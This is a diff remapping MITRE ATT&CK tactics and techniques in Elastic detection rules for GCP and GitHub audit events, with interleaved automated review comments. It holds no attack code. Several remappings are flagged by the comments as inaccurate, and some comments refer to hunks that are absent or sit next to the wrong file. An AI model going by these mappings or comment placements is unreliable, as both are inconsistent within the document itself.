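Review bot: T1222 (File and Directory Permissions Modification) describes filesystem ACL changes on a host, while the event this rule keys on, `storage.setIamPermissions` (visible in the hunk header), is an IAM policy change on a bucket, for which the removed T1098.003 (Additional Cloud Roles) was the closer description. If Defense Evasion is the intended tactic, consider keeping one of the removed Persistence or Privilege Escalation entries alongside it rather than replacing both, and record in the rule why the tactic changed. The new side also leaves two consecutive blank lines between the technique and `[rule.threat.tactic]`.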
diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml
index 7763e3925b8..49efa174d6f 100644
--- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml
+++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/22"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -64,7 +64,14 @@ references = ["https://cloud.google.com/vpc/docs/vpc"]
 risk_score = 47
 rule_id = "c58c3081-2e1d-4497-8491-e73a45d1a6d6"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Configuration Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: GCP",
+ "Data Source: Google Cloud Platform",
+ "Use Case: Configuration Audit",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
 
@@ -75,13 +82,19 @@ event.dataset:gcp.audit and event.action:v*.compute.networks.delete and event.ou
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1485"
-name = "Data Destruction"
-reference = "https://attack.mitre.org/techniques/T1485/"
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+[[rule.threat.technique.subtechnique]]
+id = "T1562.007"
+name = "Disable or Modify Cloud Firewall"
+reference = "https://attack.mitre.org/techniques/T1562/007/"
+
+
 
 [rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml
index 68be3764092..8ae59e5172f 100644
--- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml
+++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/22"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -83,18 +83,19 @@ event.dataset:gcp.audit and event.action:(v*.compute.routes.insert or "beta.comp
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1578"
-name = "Modify Cloud Compute Infrastructure"
-reference = "https://attack.mitre.org/techniques/T1578/"
-
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
 [[rule.threat.technique.subtechnique]]
-id = "T1578.005"
-name = "Modify Cloud Compute Configurations"
-reference = "https://attack.mitre.org/techniques/T1578/005/"
+id = "T1562.007"
+name = "Disable or Modify Cloud Firewall"
+reference = "https://attack.mitre.org/techniques/T1562/007/"
+
+
 
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml
index 61e82cd4529..2dbfe20dffd 100644
--- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml
+++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/22"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
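Review bot: T1562.007 (Disable or Modify Cloud Firewall) replaces T1578.005 (Modify Cloud Compute Configurations) for a VPC route insertion; a route is not a firewall rule, so unless the rule narrative argues that route changes steer traffic around firewall inspection, the removed technique was the more accurate one. The same substitution is made in the hunks for defense_evasion_gcp_virtual_private_cloud_route_deleted.toml and defense_evasion_gcp_virtual_private_cloud_network_deleted.toml. The new block also has no blank line between the technique and its sub-technique but three blank lines before `[rule.threat.tactic]`, diverging from the one-blank-line layout used elsewhere in these files.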
@@ -83,18 +83,19 @@ event.dataset:gcp.audit and event.action:v*.compute.routes.delete and event.outc
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1578"
-name = "Modify Cloud Compute Infrastructure"
-reference = "https://attack.mitre.org/techniques/T1578/"
-
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
 [[rule.threat.technique.subtechnique]]
-id = "T1578.005"
-name = "Modify Cloud Compute Configurations"
-reference = "https://attack.mitre.org/techniques/T1578/005/"
+id = "T1562.007"
+name = "Disable or Modify Cloud Firewall"
+reference = "https://attack.mitre.org/techniques/T1562/007/"
+
+
 
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml
index f75f349993b..cff4a666a38 100644
--- a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml
+++ b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/22"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -66,7 +66,14 @@ references = ["https://cloud.google.com/logging/docs/export#how_sinks_work"]
 risk_score = 21
 rule_id = "184dfe52-2999-42d9-b9d1-d1ca54495a61"
 severity = "low"
-tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Log Auditing", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: GCP",
+ "Data Source: Google Cloud Platform",
+ "Use Case: Log Auditing",
+ "Tactic: Exfiltration",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
 
@@ -77,18 +84,14 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Updat
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
+id = "T1537"
+name = "Transfer Data to Cloud Account"
+reference = "https://attack.mitre.org/techniques/T1537/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1562.008"
-name = "Disable or Modify Cloud Logs"
-reference = "https://attack.mitre.org/techniques/T1562/008/"
 
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0010"
+name = "Exfiltration"
+reference = "https://attack.mitre.org/tactics/TA0010/"
+
diff --git a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml
index 206d58ad008..d26fdfad9fe 100644
--- a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml
+++ b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/21"
 integration = ["gcp"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 
 [rule]
 author = ["Elastic"]
@@ -64,7 +64,14 @@ references = ["https://cloud.google.com/iam/docs/understanding-custom-roles"]
 risk_score = 47
 rule_id = "aa8007f0-d1df-49ef-8520-407857594827"
 severity = "medium"
-tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Cloud",
+ "Data Source: GCP",
+ "Data Source: Google Cloud Platform",
+ "Use Case: Identity and Access Audit",
+ "Tactic: Initial Access",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "query"
 
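Review bot: Replacing T1562.008/Defense Evasion with T1537/Exfiltration discards the evasion reading of a sink update entirely, although modifying a sink can equally redirect logs to a destination outside the organisation (exfiltration) or stop them reaching the SIEM (log tampering). Keeping both `[[rule.threat]]` entries would describe both outcomes; if only one is kept, the rule description (outside this hunk) needs to match the chosen tactic. The hunk also leaves two blank lines between the technique and `[rule.threat.tactic]` and adds a trailing blank line at end of file.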
@@ -75,36 +82,26 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateRole and even
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
 
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
-
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1098"
-name = "Account Manipulation"
-reference = "https://attack.mitre.org/techniques/T1098/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1098.003"
-name = "Additional Cloud Roles"
-reference = "https://attack.mitre.org/techniques/T1098/003/"
 
 [rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
+
diff --git a/rules/integrations/gcp/ml_gcp_error_message_spike.toml b/rules/integrations/gcp/ml_gcp_error_message_spike.toml
index b73fbb0215c..5a8f5a9bd87 100644
--- a/rules/integrations/gcp/ml_gcp_error_message_spike.toml
+++ b/rules/integrations/gcp/ml_gcp_error_message_spike.toml
@@ -4,7 +4,7 @@ integration = ["gcp"]
 maturity = "production"
 min_stack_comments = "New job added"
 min_stack_version = "9.3.0"
-updated_date = "2026/03/23"
+updated_date = "2025/11/21"
 
 [rule]
 anomaly_threshold = 50
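Review bot: The threat mapping now has two entries, Initial Access and Persistence, but the tags hunk for this file (previous line) keeps only `"Tactic: Initial Access"` and drops `"Tactic: Persistence"`, so `tags` and `rule.threat` disagree; either add `"Tactic: Persistence"` to `tags` or drop the second entry. T1078 (Valid Accounts) for a `CreateRole` event is also a stretch — creating a custom role is not the use of an existing credential — and the removed T1098.003 (Additional Cloud Roles) named the action precisely. The new side also has no blank line between the first entry's `reference` and the second `[[rule.threat]]`.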
@@ -48,12 +48,25 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "a4b740e4-be17-4048-9aa4-1e6f42b455b1" severity = "low" -tags = ["Domain: Cloud", "Tactic: Discovery", "Tactic: Lateral Movement", "Tactic: Privilege Escalation", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: GCP Audit Logs", + "Data Source: Google Cloud Platform", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat.technique]] id = "T1526" name = "Cloud Service Discovery" @@ -64,10 +77,13 @@ id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -77,10 +93,3 @@ id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/gcp/ml_gcp_rare_error_code.toml b/rules/integrations/gcp/ml_gcp_rare_error_code.toml index 9548cd29f37..00a36b532e7 100644 --- a/rules/integrations/gcp/ml_gcp_rare_error_code.toml +++ b/rules/integrations/gcp/ml_gcp_rare_error_code.toml 
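Review bot: All three `"Tactic: ..."` tags are removed from `tags` while the threat block still maps Discovery, Privilege Escalation and Lateral Movement, so the tag set no longer mirrors `rule.threat`; either restore `"Tactic: Discovery"`, `"Tactic: Lateral Movement"`, `"Tactic: Privilege Escalation"` or drop the corresponding threat entries. The same drop happens in the ml_gcp_rare_method_by_city, _by_country and _by_user tag hunks further down. Separately, this hunk places `[rule.threat.tactic]` before the `[[rule.threat.technique]]` entries, whereas every non-ML rule in this patch puts the tactic table last; TOML parses either order, but the ML rules should follow the same convention.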
@@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/11/21" [rule] anomaly_threshold = 50 @@ -59,3 +59,60 @@ tags = [ ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml index 51d17298fe6..6ba99513f42 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml 
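Review bot: Five of the six `[[rule.threat]]` entries added here (Privilege Escalation, Defense Evasion, Lateral Movement, Persistence, Collection) carry only a `[rule.threat.tactic]` table and no technique, which gives the mapping breadth without any ATT&CK technique to back it; a rare-error-code anomaly rarely evidences six tactics, so consider trimming to the tactics the job actually surfaces. The rule's `tags` array closes just above this hunk and its contents are not visible; if it does not carry a matching `"Tactic: ..."` tag for each mapped tactic, tags and threat block will disagree as they do in the sibling ML rules.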
@@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/11/21" [rule] anomaly_threshold = 50 @@ -49,12 +49,25 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "f20d1782-e783-4ed0-a0c4-946899a98a7c" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: GCP Audit Logs", + "Data Source: Google Cloud Platform", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -64,8 +77,3 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml index d74d7edbfd5..c151731755a 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/11/21" [rule] anomaly_threshold = 50 
@@ -49,12 +49,25 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "dcbd07f8-bd6e-4bb4-ac5d-cec1927ea88f" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: GCP Audit Logs", + "Data Source: Google Cloud Platform", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -64,8 +77,3 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml index 40c44ea56b8..0474776c35d 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/11/21" [rule] anomaly_threshold = 75 
@@ -48,12 +48,25 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "2e08f34c-691c-497e-87de-5d794a1b2a53" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: GCP Audit Logs", + "Data Source: Google Cloud Platform", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -64,7 +77,41 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.007" +name = "Cloud Services" +reference = "https://attack.mitre.org/techniques/T1021/007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" 
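Review bot: None of the four tactics mapped after this hunk (the retained Initial Access plus the new Lateral Movement, Persistence and Exfiltration) has a matching `"Tactic: ..."` tag, because the `tags` rewrite earlier in this file removes them all. The Exfiltration entry uses `id = "T1041"` Exfiltration Over C2 Channel, which presumes an attacker-controlled C2 channel that a GCP audit-log anomaly job cannot observe; if an exfiltration mapping is wanted, cloud- or web-service-oriented techniques such as T1537 or T1567 (both used elsewhere in this patch) fit better, otherwise drop the entry. The Persistence entry is tactic-only, as in the other ML rules.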
diff --git a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml index 2a88a807bf8..6060132006a 100644 --- a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml +++ b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -68,7 +68,14 @@ references = [ risk_score = 21 rule_id = "9890ee61-d061-403d-9bf6-64934c51f638" severity = "low" -tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: Google Cloud Platform", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -79,13 +86,14 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.DeleteServiceAccoun [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1531" -name = "Account Access Removal" -reference = "https://attack.mitre.org/techniques/T1531/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml b/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml index 271bbc2248a..84d9cc8278b 100644 --- a/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml 
+++ b/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -87,18 +87,14 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccoun [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/gcp/persistence_gcp_service_account_created.toml b/rules/integrations/gcp/persistence_gcp_service_account_created.toml index 0bace523e6a..64c798841be 100644 --- a/rules/integrations/gcp/persistence_gcp_service_account_created.toml +++ b/rules/integrations/gcp/persistence_gcp_service_account_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -83,18 +83,14 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccoun [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" -[[rule.threat.technique.subtechnique]] -id = "T1136.003" -name = "Cloud Account" -reference = "https://attack.mitre.org/techniques/T1136/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + 
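Review bot: Dropping the `[[rule.threat.technique.subtechnique]]` T1098.001 Additional Cloud Credentials leaves only the parent T1098 on a rule whose query (`google.iam.admin.v*.CreateServiceAccoun…` per the hunk header) is exactly the creation of an additional cloud credential, so the mapping loses precision for no gain; the same happens to T1136.003 Cloud Account in the persistence_gcp_service_account_created hunk below. Unless the subtechniques were removed on purpose, restore the four-line subtechnique block in both files.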
diff --git a/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml b/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml index b99c21b1bb6..505b0df6390 100644 --- a/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml +++ b/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -72,13 +72,19 @@ configuration where event.dataset == "github.audit" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/github/execution_github_app_deleted.toml b/rules/integrations/github/execution_github_app_deleted.toml index 0358e321943..5bf9ba190ef 100644 --- a/rules/integrations/github/execution_github_app_deleted.toml +++ b/rules/integrations/github/execution_github_app_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
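Review bot: Two consecutive blank lines are introduced between the new T1562.001 subtechnique block and `[rule.threat.tactic]`, plus another trailing blank at end of file; the other threat blocks in this patch use a single blank line between tables, so drop the extras. T1562.001 Disable or Modify Tools is a plausible fit for weakening branch protection, though the bare T1562 used before was arguably safer since a branch-protection rule is a control rather than a tool; the tags hunk for this rule is outside the visible diff, so I cannot confirm it still matches.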
@@ -50,7 +50,13 @@ GitHub Apps are integrations that extend GitHub's functionality, often used to a risk_score = 21 rule_id = "fd01b949-81be-46d5-bcf8-284395d5f56d" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -61,13 +67,14 @@ configuration where event.dataset == "github.audit" and github.category == "inte [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml index 91e435a1640..723fabe54ae 100644 --- a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml +++ b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
